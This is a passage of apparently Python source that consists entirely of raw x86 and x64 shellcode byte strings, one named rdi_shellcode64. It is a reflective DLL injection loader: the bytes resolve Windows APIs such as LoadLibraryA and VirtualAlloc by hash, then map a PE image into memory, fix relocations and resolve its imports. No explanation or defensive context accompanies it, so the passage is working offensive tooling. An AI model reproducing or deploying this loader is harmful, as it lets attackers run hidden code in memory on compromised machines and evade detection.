b'\x00\x54\x61\xC6\x84\x24\x90\x00\x00\x00\x62\x88\x94\x24\x91\x00\x00\x00\xE8\x77\x08\x00' \
b'\x00\xB9\xB5\x41\xD9\x5E\x8B\xF0\xE8\x6B\x08\x00\x00\x8B\xD8\x8D\x84\x24\xC8\x00\x00\x00' \
b'\x6A\x18\x89\x84\x24\xEC\x00\x00\x00\x58\x66\x89\x84\x24\xE6\x00\x00\x00\x66\x89\x84\x24' \
b'\xE4\x00\x00\x00\x8D\x44\x24\x1C\x50\x8D\x84\x24\xE8\x00\x00\x00\x89\x5C\x24\x34\x50\x55' \
b'\x55\xFF\xD6\x6A\x0C\x5F\x8D\x44\x24\x44\x66\x89\x7C\x24\x14\x89\x44\x24\x18\x8D\x44\x24' \
b'\x34\x50\x55\x8D\x44\x24\x1C\x66\x89\x7C\x24\x1E\x50\xFF\x74\x24\x28\xFF\xD3\x6A\x0E\x58' \
b'\x66\x89\x44\x24\x14\x66\x89\x44\x24\x16\x8D\x44\x24\x5C\x89\x44\x24\x18\x8D\x84\x24\xB4' \
b'\x00\x00\x00\x50\x55\x8D\x44\x24\x1C\x50\xFF\x74\x24\x28\xFF\xD3\x6A\x15\x58\x66\x89\x44' \
b'\x24\x14\x66\x89\x44\x24\x16\x8D\x84\x24\x94\x00\x00\x00\x89\x44\x24\x18\x8D\x84\x24\xB8' \
b'\x00\x00\x00\x50\x55\x8D\x44\x24\x1C\x50\xFF\x74\x24\x28\xFF\xD3\x6A\x13\x5E\x8D\x44\x24' \
b'\x6C\x66\x89\x74\x24\x14\x89\x44\x24\x18\x8D\x84\x24\xC4\x00\x00\x00\x50\x55\x8D\x44\x24' \
b'\x1C\x66\x89\x74\x24\x1E\x50\xFF\x74\x24\x28\xFF\xD3\x6A\x05\x58\x66\x89\x44\x24\x14\x66' \
b'\x89\x44\x24\x16\x8D\x44\x24\x3C\x89\x44\x24\x18\x8D\x84\x24\xAC\x00\x00\x00\x50\x55\x8D' \
b'\x44\x24\x1C\x50\xFF\x74\x24\x28\xFF\xD3\x8D\x84\x24\x80\x00\x00\x00\x66\x89\x74\x24\x14' \
b'\x89\x44\x24\x18\x8D\x84\x24\xE0\x00\x00\x00\x50\x55\x8D\x44\x24\x1C\x66\x89\x74\x24\x1E' \
b'\x50\xFF\x74\x24\x28\xFF\xD3\x8D\x44\x24\x50\x66\x89\x7C\x24\x14\x89\x44\x24\x18\x8D\x84' \
b'\x24\xB0\x00\x00\x00\x50\x55\x8D\x44\x24\x1C\x66\x89\x7C\x24\x1E\x50\xFF\x74\x24\x28\xFF' \
b'\xD3\x39\x6C\x24\x34\x0F\x84\x00\x07\x00\x00\x39\xAC\x24\xB4\x00\x00\x00\x0F\x84\xF3\x06' \
b'\x00\x00\x39\xAC\x24\xAC\x00\x00\x00\x0F\x84\xE6\x06\x00\x00\x39\xAC\x24\xB8\x00\x00\x00' \
b'\x0F\x84\xD9\x06\x00\x00\x8B\xAC\x24\xC4\x00\x00\x00\x85\xED\x0F\x84\xCA\x06\x00\x00\x8B' \
b'\xBC\x24\x28\x01\x00\x00\x8B\x77\x3C\x03\xF7\x81\x3E\x50\x45\x00\x00\x0F\x85\xB2\x06\x00' \
b'\x00\xB8\x4C\x01\x00\x00\x66\x39\x46\x04\x0F\x85\xA3\x06\x00\x00\xF6\x46\x38\x01\x0F\x85' \
b'\x99\x06\x00\x00\x0F\xB7\x4E\x14\x33\xDB\x0F\xB7\x56\x06\x83\xC1\x24\x85\xD2\x74\x1E\x03' \
b'\xCE\x83\x79\x04\x00\x8B\x46\x38\x0F\x45\x41\x04\x03\x01\x8D\x49\x28\x3B\xC3\x0F\x46\xC3' \
b'\x8B\xD8\x83\xEA\x01\x75\xE4\x8D\x84\x24\x00\x01\x00\x00\x50\xFF\xD5\x8B\x8C\x24\x04\x01' \
b'\x00\x00\x8D\x51\xFF\x8D\x69\xFF\xF7\xD2\x03\x6E\x50\x8D\x41\xFF\x03\xC3\x23\xEA\x23\xC2' \
b'\x3B\xE8\x0F\x85\x3D\x06\x00\x00\x6A\x04\x68\x00\x30\x00\x00\x55\xFF\x76\x34\xFF\x54\x24' \
b'\x44\x8B\xD8\x89\x5C\x24\x2C\x85\xDB\x75\x13\x6A\x04\x68\x00\x30\x00\x00\x55\x50\xFF\x54' \
b'\x24\x44\x8B\xD8\x89\x44\x24\x2C\xF6\x84\x24\x38\x01\x00\x00\x01\x74\x23\x8B\x47\x3C\x89' \
b'\x43\x3C\x8B\x4F\x3C\x3B\x4E\x54\x73\x2E\x8B\xEF\x8D\x14\x0B\x2B\xEB\x8A\x04\x2A\x41\x88' \
b'\x02\x42\x3B\x4E\x54\x72\xF4\xEB\x19\x33\xED\x39\x6E\x54\x76\x12\x8B\xD7\x8B\xCB\x2B\xD3' \
b'\x8A\x04\x11\x45\x88\x01\x41\x3B\x6E\x54\x72\xF4\x8B\x6B\x3C\x33\xC9\x03\xEB\x89\x4C\x24' \
b'\x10\x33\xC0\x89\x6C\x24\x28\x0F\xB7\x55\x14\x83\xC2\x28\x66\x3B\x45\x06\x73\x31\x03\xD5' \
b'\x33\xF6\x39\x32\x76\x19\x8B\x42\x04\x8B\x4A\xFC\x03\xC6\x03\xCB\x8A\x04\x38\x88\x04\x31' \
b'\x46\x3B\x32\x72\xEB\x8B\x4C\x24\x10\x0F\xB7\x45\x06\x41\x83\xC2\x28\x89\x4C\x24\x10\x3B' \
b'\xC8\x72\xD1\x8B\xC3\xC7\x84\x24\xBC\x00\x00\x00\x01\x00\x00\x00\x2B\x45\x34\x89\x44\x24' \
b'\x24\x0F\x84\xC4\x00\x00\x00\x83\xBD\xA4\x00\x00\x00\x00\x0F\x84\xB7\x00\x00\x00\x8B\xB5' \
b'\xA0\x00\x00\x00\x03\xF3\x83\x3E\x00\x0F\x84\xA6\x00\x00\x00\x6A\x02\x8B\xF8\x5D\x8D\x56' \
b'\x08\xEB\x75\x0F\xB7\x02\x89\x44\x24\x10\x0F\xB7\xC8\x66\xC1\xE8\x0C\x66\x83\xF8\x0A\x75' \
b'\x28\x8B\x16\x8B\x4C\x24\x10\x81\xE1\xFF\x0F\x00\x00\x89\x4C\x24\x10\x8D\x04\x1A\x8B\x0C' \
b'\x08\x8D\x04\x1A\x8B\x54\x24\x10\x03\xCF\x89\x0C\x10\x8B\x54\x24\x24\xEB\x37\x66\x83\xF8' \
b'\x03\x75\x0D\x81\xE1\xFF\x0F\x00\x00\x03\x0E\x01\x3C\x19\xEB\x24\x66\x3B\x84\x24\xBC\x00' \
b'\x00\x00\x75\x07\x8B\xC7\xC1\xE8\x10\xEB\x08\x66\x3B\xC5\x75\x0E\x0F\xB7\xC7\x81\xE1\xFF' \
b'\x0F\x00\x00\x03\x0E\x01\x04\x19\x03\xD5\x8B\x46\x04\x03\xC6\x89\x54\x24\x24\x3B\xD0\x0F' \
b'\x85\x7A\xFF\xFF\xFF\x83\x3A\x00\x8B\xF2\x0F\x85\x6A\xFF\xFF\xFF\x8B\x6C\x24\x28\x8B\xBC' \
b'\x24\x28\x01\x00\x00\x83\xBD\x84\x00\x00\x00\x00\x0F\x84\xD7\x01\x00\x00\x8B\xB5\x80\x00' \
b'\x00\x00\x33\xC0\x89\x44\x24\x10\x8D\x0C\x1E\x89\x4C\x24\x24\x83\xC1\x0C\x39\x01\x74\x0D' \
b'\x8D\x49\x14\x40\x83\x39\x00\x75\xF7\x89\x44\x24\x10\x8B\x8C\x24\x38\x01\x00\x00\x8B\xD1' \
b'\x83\xE2\x04\x89\x54\x24\x38\x8B\xD6\x0F\x84\xC3\x00\x00\x00\x83\xF8\x01\x0F\x86\xBA\x00' \
b'\x00\x00\x83\xA4\x24\xBC\x00\x00\x00\x00\xC1\xE9\x10\x89\x8C\x24\x38\x01\x00\x00\x8D\x48' \
b'\xFF\x89\x8C\x24\xC0\x00\x00\x00\x85\xC9\x0F\x84\xA1\x00\x00\x00\x8B\x74\x24\x24\x8B\xDE' \
b'\x8B\xAC\x24\xBC\x00\x00\x00\x8B\xC8\x69\xFF\xFD\x43\x03\x00\x2B\xCD\x33\xD2\xB8\xFF\x7F' \
b'\x00\x00\xF7\xF1\x81\xC7\xC3\x9E\x26\x00\x33\xD2\x89\xBC\x24\x28\x01\x00\x00\x6A\x05\x8D' \
b'\x48\x01\x8B\xC7\xC1\xE8\x10\x8D\xBC\x24\xF0\x00\x00\x00\x25\xFF\x7F\x00\x00\xF7\xF1\x59' \
b'\x03\xC5\x6B\xC0\x14\x6A\x05\x03\xC6\x45\x8B\xF0\xF3\xA5\x59\x8B\xF3\x8B\xF8\x8B\x44\x24' \
b'\x10\xF3\xA5\x6A\x05\x8B\xFB\x8D\xB4\x24\xF0\x00\x00\x00\x59\xF3\xA5\x8B\xBC\x24\x28\x01' \
b'\x00\x00\x83\xC3\x14\x8B\x74\x24\x24\x3B\xAC\x24\xC0\x00\x00\x00\x72\x87\x8B\x6C\x24\x28' \
b'\x8B\x5C\x24\x2C\x8B\x95\x80\x00\x00\x00\xEB\x0B\x8B\x44\x24\x38\x89\x84\x24\x38\x01\x00' \
b'\x00\x8D\x3C\x1A\x8B\x47\x0C\x89\x7C\x24\x2C\x85\xC0\x0F\x84\xB8\x00\x00\x00\x03\xC3\x50' \
b'\xFF\x94\x24\xB4\x00\x00\x00\x8B\xD0\x89\x54\x24\x1C\x8B\x37\x8B\x6F\x10\x03\xF3\x03\xEB' \
b'\x8B\x0E\x85\xC9\x74\x60\x8B\x7C\x24\x30\x85\xC9\x79\x09\x0F\xB7\x06\x55\x50\x6A\x00\xEB' \
b'\x36\x83\xC1\x02\x33\xC0\x03\xCB\x89\x8C\x24\xC0\x00\x00\x00\x38\x01\x74\x0E\x40\x41\x80' \
b'\x39\x00\x75\xF9\x8B\x8C\x24\xC0\x00\x00\x00\x55\x66\x89\x44\x24\x18\x66\x89\x44\x24\x1A' \
b'\x8D\x44\x24\x18\x6A\x00\x89\x4C\x24\x20\x50\x52\xFF\xD7\x83\xC6\x04\x83\xC5\x04\x8B\x0E' \
b'\x85\xC9\x74\x06\x8B\x54\x24\x1C\xEB\xA8\x8B\x7C\x24\x2C\x83\x7C\x24\x38\x00\x74\x1C\x33' \
b'\xC0\x40\x39\x44\x24\x10\x76\x13\x69\x84\x24\x38\x01\x00\x00\xE8\x03\x00\x00\x50\xFF\x94' \
b'\x24\xB0\x00\x00\x00\x8B\x47\x20\x83\xC7\x14\x89\x7C\x24\x2C\x85\xC0\x0F\x85\x4C\xFF\xFF' \
b'\xFF\x8B\x6C\x24\x28\x83\xBD\xE4\x00\x00\x00\x00\x0F\x84\xAD\x00\x00\x00\x8B\x85\xE0\x00' \
b'\x00\x00\x83\xC0\x04\x03\xC3\x89\x44\x24\x10\x8B\x00\x85\xC0\x0F\x84\x94\x00\x00\x00\x8B' \
b'\x6C\x24\x10\x03\xC3\x50\xFF\x94\x24\xB4\x00\x00\x00\x8B\xC8\x89\x4C\x24\x1C\x8B\x75\x08' \
b'\x8B\x7D\x0C\x03\xF3\x03\xFB\x83\x3E\x00\x74\x5B\x8B\x6C\x24\x30\x8B\x17\x85\xD2\x79\x09' \
b'\x56\x0F\xB7\xC2\x50\x6A\x00\xEB\x30\x83\xC2\x02\x33\xC0\x03\xD3\x89\x54\x24\x38\x38\x02' \
b'\x74\x0B\x40\x42\x80\x3A\x00\x75\xF9\x8B\x54\x24\x38\x56\x66\x89\x44\x24\x18\x66\x89\x44' \
b'\x24\x1A\x8D\x44\x24\x18\x6A\x00\x89\x54\x24\x20\x50\x51\xFF\xD5\x83\xC6\x04\x83\xC7\x04' \
b'\x83\x3E\x00\x74\x06\x8B\x4C\x24\x1C\xEB\xAD\x8B\x6C\x24\x10\x83\xC5\x20\x89\x6C\x24\x10' \
b'\x8B\x45\x00\x85\xC0\x0F\x85\x74\xFF\xFF\xFF\x8B\x6C\x24\x28\x0F\xB7\x75\x14\x33\xC0\x83' \
b'\xC6\x28\x33\xFF\x66\x3B\x45\x06\x0F\x83\xE5\x00\x00\x00\x03\xF5\xBA\x00\x00\x00\x40\x83' \
b'\x3E\x00\x0F\x84\xC5\x00\x00\x00\x8B\x4E\x14\x8B\xC1\x25\x00\x00\x00\x20\x75\x0B\x85\xCA' \
b'\x75\x07\x85\xC9\x78\x03\x40\xEB\x62\x85\xC0\x75\x30\x85\xCA\x75\x08\x85\xC9\x79\x04\x6A' \
b'\x08\xEB\x51\x85\xC0\x75\x20\x85\xCA\x74\x08\x85\xC9\x78\x04\x6A\x02\xEB\x41\x85\xC0\x75' \
b'\x10\x85\xCA\x74\x08\x85\xC9\x79\x04\x6A\x04\xEB\x31\x85\xC0\x74\x4A\x85\xCA\x75\x08\x85' \
b'\xC9\x78\x04\x6A\x10\xEB\x21\x85\xC0\x74\x3A\x85\xCA\x75\x0B\x85\xC9\x79\x07\xB8\x80\x00' \
b'\x00\x00\xEB\x0F\x85\xC0\x74\x27\x85\xCA\x74\x0D\x85\xC9\x78\x09\x6A\x20\x58\x89\x44\x24' \
b'\x20\xEB\x1A\x85\xC0\x74\x12\x85\xCA\x74\x0E\x8B\x44\x24\x20\x85\xC9\x6A\x40\x5A\x0F\x48' \
b'\xC2\xEB\xE4\x8B\x44\x24\x20\xF7\x46\x14\x00\x00\x00\x04\x74\x09\x0D\x00\x02\x00\x00\x89' \
b'\x44\x24\x20\x8D\x4C\x24\x20\x51\x50\x8B\x46\xFC\xFF\x36\x03\xC3\x50\xFF\x94\x24\xC4\x00' \
b'\x00\x00\xBA\x00\x00\x00\x40\x0F\xB7\x45\x06\x47\x83\xC6\x28\x3B\xF8\x0F\x82\x22\xFF\xFF' \
b'\xFF\x6A\x00\x6A\x00\x6A\xFF\xFF\x94\x24\xC4\x00\x00\x00\x83\xBD\xC4\x00\x00\x00\x00\x74' \
b'\x26\x8B\x85\xC0\x00\x00\x00\x8B\x74\x18\x0C\x8B\x06\x85\xC0\x74\x16\x33\xED\x45\x6A\x00' \
b'\x55\x53\xFF\xD0\x8D\x76\x04\x8B\x06\x85\xC0\x75\xF1\x8B\x6C\x24\x28\x33\xC0\x40\x50\x50' \
b'\x8B\x45\x28\x53\x03\xC3\xFF\xD0\x83\xBC\x24\x2C\x01\x00\x00\x00\x0F\x84\xAB\x00\x00\x00' \
b'\x83\x7D\x7C\x00\x0F\x84\xA1\x00\x00\x00\x8B\x55\x78\x03\xD3\x8B\x6A\x18\x85\xED\x0F\x84' \
b'\x91\x00\x00\x00\x83\x7A\x14\x00\x0F\x84\x87\x00\x00\x00\x8B\x7A\x20\x8B\x4A\x24\x03\xFB' \
b'\x83\x64\x24\x30\x00\x03\xCB\x85\xED\x74\x74\x8B\x37\xC7\x44\x24\x10\x00\x00\x00\x00\x03' \
b'\xF3\x74\x66\x8A\x06\x84\xC0\x74\x1A\x8B\x6C\x24\x10\x0F\xBE\xC0\x03\xE8\xC1\xCD\x0D\x46' \
b'\x8A\x06\x84\xC0\x75\xF1\x89\x6C\x24\x10\x8B\x6A\x18\x8B\x84\x24\x2C\x01\x00\x00\x3B\x44' \
b'\x24\x10\x75\x04\x85\xC9\x75\x15\x8B\x44\x24\x30\x83\xC7\x04\x40\x83\xC1\x02\x89\x44\x24' \
b'\x30\x3B\xC5\x72\xAE\xEB\x20\x0F\xB7\x09\x8B\x42\x1C\xFF\xB4\x24\x34\x01\x00\x00\xFF\xB4' \
b'\x24\x34\x01\x00\x00\x8D\x04\x88\x8B\x04\x18\x03\xC3\xFF\xD0\x59\x59\x8B\xC3\xEB\x02\x33' \
b'\xC0\x5F\x5E\x5D\x5B\x81\xC4\x14\x01\x00\x00\xC3\x83\xEC\x14\x64\xA1\x30\x00\x00\x00\x53' \
b'\x55\x56\x8B\x40\x0C\x57\x89\x4C\x24\x1C\x8B\x78\x0C\xE9\xA5\x00\x00\x00\x8B\x47\x30\x33' \
b'\xF6\x8B\x5F\x2C\x8B\x3F\x89\x44\x24\x10\x8B\x42\x3C\x89\x7C\x24\x14\x8B\x6C\x10\x78\x89' \
b'\x6C\x24\x18\x85\xED\x0F\x84\x80\x00\x00\x00\xC1\xEB\x10\x33\xC9\x85\xDB\x74\x2F\x8B\x7C' \
b'\x24\x10\x0F\xBE\x2C\x0F\xC1\xCE\x0D\x80\x3C\x0F\x61\x89\x6C\x24\x10\x7C\x09\x8B\xC5\x83' \
b'\xC0\xE0\x03\xF0\xEB\x04\x03\x74\x24\x10\x41\x3B\xCB\x72\xDD\x8B\x7C\x24\x14\x8B\x6C\x24' \
b'\x18\x8B\x44\x2A\x20\x33\xDB\x8B\x4C\x2A\x18\x03\xC2\x89\x4C\x24\x10\x85\xC9\x74\x34\x8B' \
b'\x38\x33\xED\x03\xFA\x83\xC0\x04\x89\x44\x24\x20\x8A\x0F\xC1\xCD\x0D\x0F\xBE\xC1\x03\xE8' \
b'\x47\x84\xC9\x75\xF1\x8B\x7C\x24\x14\x8D\x04\x2E\x3B\x44\x24\x1C\x74\x20\x8B\x44\x24\x20' \
b'\x43\x3B\x5C\x24\x10\x72\xCC\x8B\x57\x18\x85\xD2\x0F\x85\x50\xFF\xFF\xFF\x33\xC0\x5F\x5E' \
b'\x5D\x5B\x83\xC4\x14\xC3\x8B\x74\x24\x18\x8B\x44\x16\x24\x8D\x04\x58\x0F\xB7\x0C\x10\x8B' \
b'\x44\x16\x1C\x8D\x04\x88\x8B\x04\x10\x03\xC2\xEB\xDB '
rdi_shellcode64 = b'\x48\x8B\xC4\x48\x89\x58\x08\x44\x89\x48\x20\x4C\x89\x40\x18\x89\x50\x10\x55\x56\x57\x41' \
b'\x54\x41\x55\x41\x56\x41\x57\x48\x8D\x6C\x24\x90\x48\x81\xEC\x70\x01\x00\x00\x45\x33\xFF' \
b'\xC7\x45\xD8\x6B\x00\x65\x00\x48\x8B\xF1\x4C\x89\x7D\xF8\xB9\x13\x9C\xBF\xBD\x4C\x89\x7D' \
b'\xC8\x4C\x89\x7D\x08\x45\x8D\x4F\x65\x4C\x89\x7D\x10\x44\x88\x4D\xBC\x44\x88\x4D\xA2\x4C' \
b'\x89\x7D\x00\x4C\x89\x7D\xF0\x4C\x89\x7D\x18\x44\x89\x7D\x24\x44\x89\x7C\x24\x2C\xC7\x45' \
b'\xDC\x72\x00\x6E\x00\xC7\x45\xE0\x65\x00\x6C\x00\xC7\x45\xE4\x33\x00\x32\x00\xC7\x45\xE8' \
b'\x2E\x00\x64\x00\xC7\x45\xEC\x6C\x00\x6C\x00\xC7\x44\x24\x40\x53\x6C\x65\x65\xC6\x44\x24' \
b'\x44\x70\xC7\x44\x24\x58\x4C\x6F\x61\x64\xC7\x44\x24\x5C\x4C\x69\x62\x72\xC7\x44\x24\x60' \
b'\x61\x72\x79\x41\xC7\x44\x24\x48\x56\x69\x72\x74\xC7\x44\x24\x4C\x75\x61\x6C\x41\xC7\x44' \
b'\x24\x50\x6C\x6C\x6F\x63\xC7\x44\x24\x68\x56\x69\x72\x74\xC7\x44\x24\x6C\x75\x61\x6C\x50' \
b'\xC7\x44\x24\x70\x72\x6F\x74\x65\x66\xC7\x44\x24\x74\x63\x74\xC7\x45\xA8\x46\x6C\x75\x73' \
b'\xC7\x45\xAC\x68\x49\x6E\x73\xC7\x45\xB0\x74\x72\x75\x63\xC7\x45\xB4\x74\x69\x6F\x6E\xC7' \
b'\x45\xB8\x43\x61\x63\x68\xC7\x44\x24\x78\x47\x65\x74\x4E\xC7\x44\x24\x7C\x61\x74\x69\x76' \
b'\xC7\x45\x80\x65\x53\x79\x73\xC7\x45\x84\x74\x65\x6D\x49\x66\xC7\x45\x88\x6E\x66\xC6\x45' \
b'\x8A\x6F\xC7\x45\x90\x52\x74\x6C\x41\xC7\x45\x94\x64\x64\x46\x75\xC7\x45\x98\x6E\x63\x74' \
b'\x69\xC7\x45\x9C\x6F\x6E\x54\x61\x66\xC7\x45\xA0\x62\x6C\xE8\x7F\x08\x00\x00\xB9\xB5\x41' \
b'\xD9\x5E\x48\x8B\xD8\xE8\x72\x08\x00\x00\x4C\x8B\xE8\x48\x89\x45\xD0\x48\x8D\x45\xD8\xC7' \
b'\x45\x20\x18\x00\x18\x00\x4C\x8D\x4C\x24\x38\x48\x89\x45\x28\x4C\x8D\x45\x20\x33\xD2\x33' \
b'\xC9\xFF\xD3\x48\x8B\x4C\x24\x38\x48\x8D\x44\x24\x48\x45\x33\xC0\x48\x89\x44\x24\x30\x4C' \
b'\x8D\x4D\xC8\xC7\x44\x24\x28\x0C\x00\x0C\x00\x48\x8D\x54\x24\x28\x41\xFF\xD5\x48\x8B\x4C' \
b'\x24\x38\x48\x8D\x44\x24\x68\x45\x33\xC0\x48\x89\x44\x24\x30\x4C\x8D\x4D\x00\xC7\x44\x24' \
b'\x28\x0E\x00\x0E\x00\x48\x8D\x54\x24\x28\x41\xFF\xD5\x48\x8D\x45\xA8\xC7\x44\x24\x28\x15' \
b'\x00\x15\x00\x48\x8B\x4C\x24\x38\x4C\x8D\x4D\x08\x45\x33\xC0\x48\x89\x44\x24\x30\x48\x8D' \
b'\x54\x24\x28\x41\xFF\xD5\x48\x8B\x4C\x24\x38\x48\x8D\x44\x24\x78\x45\x33\xC0\x48\x89\x44' \
b'\x24\x30\x4C\x8D\x4D\x10\xC7\x44\x24\x28\x13\x00\x13\x00\x48\x8D\x54\x24\x28\x41\xFF\xD5' \
b'\x48\x8B\x4C\x24\x38\x48\x8D\x44\x24\x40\x45\x33\xC0\x48\x89\x44\x24\x30\x4C\x8D\x4D\xF0' \
b'\xC7\x44\x24\x28\x05\x00\x05\x00\x48\x8D\x54\x24\x28\x41\xFF\xD5\x48\x8B\x4C\x24\x38\x48' \
b'\x8D\x45\x90\x45\x33\xC0\x48\x89\x44\x24\x30\x4C\x8D\x4D\x18\xC7\x44\x24\x28\x13\x00\x13' \
b'\x00\x48\x8D\x54\x24\x28\x41\xFF\xD5\x48\x8B\x4C\x24\x38\x48\x8D\x44\x24\x58\x45\x33\xC0' \
b'\x48\x89\x44\x24\x30\x4C\x8D\x4D\xF8\xC7\x44\x24\x28\x0C\x00\x0C\x00\x48\x8D\x54\x24\x28' \
b'\x41\xFF\xD5\x4C\x39\x7D\xC8\x0F\x84\x1D\x07\x00\x00\x4C\x39\x7D\x00\x0F\x84\x13\x07\x00' \
b'\x00\x4C\x39\x7D\xF0\x0F\x84\x09\x07\x00\x00\x4C\x39\x7D\x08\x0F\x84\xFF\x06\x00\x00\x48' \
b'\x8B\x55\x10\x48\x85\xD2\x0F\x84\xF2\x06\x00\x00\x48\x63\x7E\x3C\x48\x03\xFE\x81\x3F\x50' \
b'\x45\x00\x00\x0F\x85\xDF\x06\x00\x00\xB8\x64\x86\x00\x00\x66\x39\x47\x04\x0F\x85\xD0\x06' \
b'\x00\x00\x45\x8D\x4F\x01\x44\x84\x4F\x38\x0F\x85\xC2\x06\x00\x00\x0F\xB7\x4F\x14\x41\x8B' \
b'\xDF\x48\x83\xC1\x24\x66\x44\x3B\x7F\x06\x73\x25\x44\x0F\xB7\x47\x06\x48\x03\xCF\x44\x39' \
b'\x79\x04\x8B\x47\x38\x0F\x45\x41\x04\x03\x01\x48\x8D\x49\x28\x3B\xC3\x0F\x46\xC3\x8B\xD8' \
b'\x4D\x2B\xC1\x75\xE3\x48\x8D\x4D\x38\xFF\xD2\x8B\x55\x3C\x44\x8B\xC2\x44\x8D\x72\xFF\xF7' \
b'\xDA\x44\x03\x77\x50\x49\x8D\x48\xFF\x8B\xC2\x4C\x23\xF0\x8B\xC3\x48\x03\xC8\x49\x8D\x40' \
b'\xFF\x48\xF7\xD0\x48\x23\xC8\x4C\x3B\xF1\x0F\x85\x54\x06\x00\x00\x48\x8B\x4F\x30\x41\xBC' \
b'\x00\x30\x00\x00\x45\x8B\xC4\x41\xB9\x04\x00\x00\x00\x49\x8B\xD6\xFF\x55\xC8\x48\x8B\xD8' \
b'\x48\x85\xC0\x75\x12\x44\x8D\x48\x04\x45\x8B\xC4\x49\x8B\xD6\x33\xC9\xFF\x55\xC8\x48\x8B' \
b'\xD8\x44\x8B\xA5\xD0\x00\x00\x00\x41\xBB\x01\x00\x00\x00\x45\x84\xE3\x74\x1D\x8B\x46\x3C' \
b'\x89\x43\x3C\x8B\x56\x3C\xEB\x0B\x8B\xCA\x41\x03\xD3\x8A\x04\x31\x88\x04\x19\x3B\x57\x54' \
b'\x72\xF0\xEB\x19\x41\x8B\xD7\x44\x39\x7F\x54\x76\x10\x8B\xCA\x41\x03\xD3\x8A\x04\x31\x88' \
b'\x04\x19\x3B\x57\x54\x72\xF0\x48\x63\x7B\x3C\x45\x8B\xD7\x48\x03\xFB\x48\x89\x7D\x30\x44' \
b'\x0F\xB7\x47\x14\x49\x83\xC0\x28\x66\x44\x3B\x7F\x06\x73\x3A\x4C\x03\xC7\x45\x8B\xCF\x45' \
b'\x39\x38\x76\x1F\x41\x8B\x50\x04\x41\x8B\x48\xFC\x41\x8B\xC1\x45\x03\xCB\x48\x03\xC8\x48' \
b'\x03\xD0\x8A\x04\x32\x88\x04\x19\x45\x3B\x08\x72\xE1\x0F\xB7\x47\x06\x45\x03\xD3\x49\x83' \
b'\xC0\x28\x44\x3B\xD0\x72\xC9\x4C\x8B\xF3\x41\xB8\x02\x00\x00\x00\x4C\x2B\x77\x30\x0F\x84' \
b'\xD6\x00\x00\x00\x44\x39\xBF\xB4\x00\x00\x00\x0F\x84\xC9\x00\x00\x00\x44\x8B\x8F\xB0\x00' \
b'\x00\x00\x4C\x03\xCB\x45\x39\x39\x0F\x84\xB6\x00\x00\x00\x4D\x8D\x51\x08\xE9\x91\x00\x00' \
b'\x00\x45\x0F\xB7\x1A\x41\x0F\xB7\xCB\x41\x0F\xB7\xC3\x66\xC1\xE9\x0C\x66\x83\xF9\x0A\x75' \
b'\x29\x45\x8B\x01\x41\x81\xE3\xFF\x0F\x00\x00\x4B\x8D\x04\x18\x48\x8B\x14\x18\x4B\x8D\x04' \
b'\x18\x41\xBB\x01\x00\x00\x00\x49\x03\xD6\x48\x89\x14\x18\x45\x8D\x43\x01\xEB\x4F\x41\xBB' \
b'\x01\x00\x00\x00\x66\x83\xF9\x03\x75\x0E\x25\xFF\x0F\x00\x00\x48\x8D\x0C\x03\x41\x8B\xC6' \
b'\xEB\x2E\x66\x41\x3B\xCB\x75\x15\x25\xFF\x0F\x00\x00\x48\x8D\x0C\x03\x49\x8B\xC6\x48\xC1' \
b'\xE8\x10\x0F\xB7\xC0\xEB\x13\x66\x41\x3B\xC8\x75\x14\x25\xFF\x0F\x00\x00\x48\x8D\x0C\x03' \
b'\x41\x0F\xB7\xC6\x41\x8B\x11\x48\x01\x04\x0A\x4D\x03\xD0\x41\x8B\x41\x04\x49\x03\xC1\x4C' \
b'\x3B\xD0\x0F\x85\x5F\xFF\xFF\xFF\x4D\x8B\xCA\x45\x39\x3A\x0F\x85\x4A\xFF\xFF\xFF\x44\x39' \
b'\xBF\x94\x00\x00\x00\x0F\x84\x82\x01\x00\x00\x8B\x8F\x90\x00\x00\x00\x45\x8B\xEF\x4C\x8D' \
b'\x04\x19\x49\x8D\x40\x0C\xEB\x07\x45\x03\xEB\x48\x8D\x40\x14\x44\x39\x38\x75\xF4\x41\x8B' \
b'\xC4\x83\xE0\x04\x89\x45\xC0\x8B\xC1\x0F\x84\x89\x00\x00\x00\x45\x3B\xEB\x0F\x86\x80\x00' \
b'\x00\x00\x41\xC1\xEC\x10\x45\x8D\x5D\xFF\x45\x8B\xD7\x45\x85\xDB\x74\x74\x4D\x8B\xC8\x41' \
b'\xBE\xFF\x7F\x00\x00\x41\x0F\x10\x01\x33\xD2\x41\x8B\xCD\x41\x2B\xCA\x69\xF6\xFD\x43\x03' \
b'\x00\x41\x8B\xC6\xF7\xF1\x33\xD2\x81\xC6\xC3\x9E\x26\x00\x8D\x48\x01\x8B\xC6\xC1\xE8\x10' \
b'\x41\x23\xC6\xF7\xF1\x41\x03\xC2\x41\xFF\xC2\x48\x8D\x0C\x80\x41\x8B\x54\x88\x10\x41\x0F' \
b'\x10\x0C\x88\x41\x0F\x11\x04\x88\x41\x8B\x41\x10\x41\x89\x44\x88\x10\x41\x0F\x11\x09\x41' \
b'\x89\x51\x10\x4D\x8D\x49\x14\x45\x3B\xD3\x72\xA1\x8B\x87\x90\x00\x00\x00\xEB\x04\x44\x8B' \
b'\x65\xC0\x8B\xF0\x48\x03\xF3\x8B\x46\x0C\x85\xC0\x0F\x84\xB1\x00\x00\x00\x8B\x7D\xC0\x8B' \
b'\xC8\x48\x03\xCB\xFF\x55\xF8\x48\x89\x44\x24\x38\x4C\x8B\xD0\x44\x8B\x36\x44\x8B\x7E\x10' \
b'\x4C\x03\xF3\x4C\x03\xFB\x49\x8B\x0E\x48\x85\xC9\x74\x5F\x48\x85\xC9\x79\x08\x45\x0F\xB7' \
b'\x06\x33\xD2\xEB\x32\x48\x8D\x53\x02\x33\xC0\x48\x03\xD1\x38\x02\x74\x0E\x48\x8B\xCA\x48' \
b'\xFF\xC1\x48\xFF\xC0\x80\x39\x00\x75\xF5\x48\x89\x54\x24\x30\x45\x33\xC0\x48\x8D\x54\x24' \
b'\x28\x66\x89\x44\x24\x28\x66\x89\x44\x24\x2A\x4D\x8B\xCF\x49\x8B\xCA\xFF\x55\xD0\x49\x83' \
b'\xC6\x08\x49\x83\xC7\x08\x49\x8B\x0E\x48\x85\xC9\x74\x07\x4C\x8B\x54\x24\x38\xEB\xA1\x45' \
b'\x33\xFF\x85\xFF\x74\x10\x41\x83\xFD\x01\x76\x0A\x41\x69\xCC\xE8\x03\x00\x00\xFF\x55\xF0' \
